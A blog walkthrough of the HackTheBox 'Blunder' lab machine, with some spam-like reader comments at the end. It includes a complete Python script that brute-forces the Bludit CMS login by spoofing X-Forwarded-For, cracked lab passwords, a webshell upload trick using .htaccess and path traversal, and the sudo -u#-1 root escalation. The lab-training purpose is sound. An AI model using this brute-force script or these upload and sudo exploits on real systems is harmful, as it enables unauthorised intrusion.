Blunder: Hackthebox Walkthrough

Blunder: Hackthebox Walkthrough

Hey all! In this blog post, we’ll be walking through blunder from hackthebox. Blunder is an easy level linux machine.  

Summary

The initial foothold on the box requires a bit of enumeration to find out the correct user who can login into CMS:- bludit. There is the file upload vulnerability on the cms that gets the initial shell on the box. With enumeration, we need to find the password for the user on he box. Privilege escalation to root is pretty simple as we just need to identify the privileges granted to the user.

With all that said, lets get started.

Starting with the namp scan, I found port 80 to be open, whereas port 21 (ftp) was filtered. So its of no use.

# nmap -sC -sV -oA blunder.nmap 10.10.10.191

Next, I went to http://10.10.10.191 . A page landed.

Cool! Scrolling through the contents, I found out that is is kind of a blog page.

About page was much like a riddle

I spawned a gobuster scan on the host

# gobuster dir --url  http://10.10.10.191   -t 50  -w /usr/share/seclists/Discovery/Web-Content/big.txt -o gobuster.out

Looking at the output, /admin seemed interesting, so i jumped right into the http://10.10.10.191/admin and there was a login page.

The title mentioned bludit so i googled for it. It turned out to be the CMS. I searched for any exploits for the cms

These 2 were authenticated attacks, so not of any use now. Googling for bludit exploits took me here (https://github.com/bludit/bludit/pull/1090) . It was basically bruteforcing the password for the user. The version affected was 3.9.2 so I tried to check the version of bludit installed on the box.

On google.com search bludit github and the directory structure will open. From there, one can understand what all directories might be present for the cms. 

Its a good practice to seach for the github repo of any cms to check for useful directories and files.

I found the version of bludit inside /bl-themes/blogx/metadata.json. And its was 3.9.2

But the prob now is, we dont know the user. Writing admin would be a lame guess. Maybe, I was missing out some directories/files that were not visible in the gobuster out.

So this time, i ran gobuster with some extension flags ( php and txt ) and used seclists-common.txt as the wordlist.

# gobuster dir --url  http://10.10.10.191/ -t 50  -w /usr/share/seclists/Discovery/Web-Content/common.txt -o gobuster_dir1.out -x php,txt -s 200,204,401,403

When i listed the contents of todo.txt, it unveiled the user to be fergus.

I modified the script to add the wordlist of my choice

!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login.php'
username = 'fergus'
wordlist = []
def file_read(fname):
    	with open(fname) as f:
            	#Content_list is the list that contains the read lines.	 
            	for line in f:
                    	wordlist.append(line.strip())   
            	print(wordlist)
file_read('password_index.txt')
# Add the correct password to the end of the list
wordlist.append('adminadmin')

for password in wordlist:
	session = requests.Session()
	login_page = session.get(login_url)
	csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

	print('[*] Trying: {p}'.format(p = password))

	headers = {
    	'X-Forwarded-For': password,
    	'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0',
    	'Referer': login_url
	}

	data = {
    	'tokenCSRF': csrf_token,
    	'username': username,
    	'password': password,
    	'save': ''
	}

	login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

	if 'location' in login_result.headers:
    	if '/admin/dashboard' in login_result.headers['location']:
        	print()
        	print('SUCCESS: Password found!')
        	print('Use {u}:{p} to login.'.format(u = username, p = password))
        	print()
        	break

I used a lots of wordlist to brute-force the password, but none of them worked. Finally i created a wordlist out of content of the website. It can be done using cewl.

# cewl http://10.10.10.191/ -w password_index.txt
# python exploit.py

And it worked revealing the password to be RolandDeschain.

I quickly logged in to the CMS with the credentials.

There was a section to add new-content.

This is the place where we found the image upload vulnerability in the searchsploit. The issue is describe here (https://github.com/bludit/bludit/issues/1081

The contents of the image is changed to php webshell. GIF89a at the bebeginning will dupe the server to believe it to be a gif file. Also, the exploit uses tempering the uuid  parameter to ../../tmp/temp. So our malicious file will be stored in /tmp/temp directory. 

Also, a crafted .htaccess file has to be uploaded. Using AddType in your .htaccess file, one can add many other extensions from which PHP can be ran. In a nutshell, we’re using .htaccess so that the image.jpg could be converted to image.php ( the file will now execute commands). 

Now that the .htaccess is uploaded, shell.php can be accessed in http://10.10.10.191/bl-content/tmp/shell.php .(even if the extension of shell is .jpg, the exploit is gonna work.) I grabbed a simple one-liner reverse shell from pentest monkey and spawned a listener on the local box. 

And got the initial foothold.

Getting the user.txt

I started to enumerate with linpeas.sh but found nothing interesting. There were 2 users on the box hugo and shaun with hugo having the user.txt.

Then i started manual enumeration and came across /var/www. There were 2 versions of bludit present. On digging, I found out the sha1 password hash for hugo. 

I went to an online decrypter https://md5decrypt.net/en/ to crack the hash.

Since now i had the password to be Password120, I did su – hogo on the box.

I am hugo now. The user.txt can be grabbed now.

Privilege escalation to root!!!

Upon initial enumeration, I found that sudo is present on the box. So I quickly ran sudo -l

Hugo can run /bin/bash but not as root! I search the exact string on google and landed up on an exploit https://www.exploit-db.com/exploits/47502

Exploit description

Sudo doesn’t check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
-u#-1 returns as 0 which is root’s id
and /bin/bash is executed with root permission

Got root!!

Thats all for the blog post!! Thanks for reading! For more such content visit here
See you in the next post. Until then, happy hunting!!

+9

shreyapohekar

I am Shreya Pohekar. I love to build and break stuff. Currently, I'm working as iOS and angular developer. I am also a contributor to CodeVigilant project. My blogs are focused on Infosec and Dev and its how to's.

This Post Has 12 Comments

  1. WWW.XMC.PL

    I was researching on the web for some info since yesterday night and I ultimately found what i was looking for! This is a great blog by the way, but it looks a little hard to see from my att phone

    0
  2. I want to take this moment to say that I really love this blog. It has been a good resource of information for me in my research. Thank you so much.

    0
  3. Thanks for the pleasant read! Ok break time is over and back to my homework.

    0
  4. Japan Anthem

    I like this site very much, Its a very nice place to read and receive info .

    0
  5. USA Gospodarka

    An impressive share, I simply given this onto a colleague who was doing a bit evaluation on this. And he the truth is purchased me breakfast as a result of I found it for him.. smile. So let me reword that: Thnx for the deal with! However yeah Thnkx for spending the time to debate this, I really feel strongly about it and love studying more on this topic. If attainable, as you turn into experience, would you mind updating your weblog with extra details? Its extremely helpful for me. Large thumb up for this blog put up!

    0
  6. Cukrzyca.XMC.pl

    Awseome article, I am a big believer in leaving comments on blogs to help the blog writers know that theyve added something useful to the world wide web!

    0
  7. Tiffani

    What’s up to every , because I am in fact eager of reading this weblog’s post
    to be updated on a regular basis. It consists of good data.

    0

Leave a Reply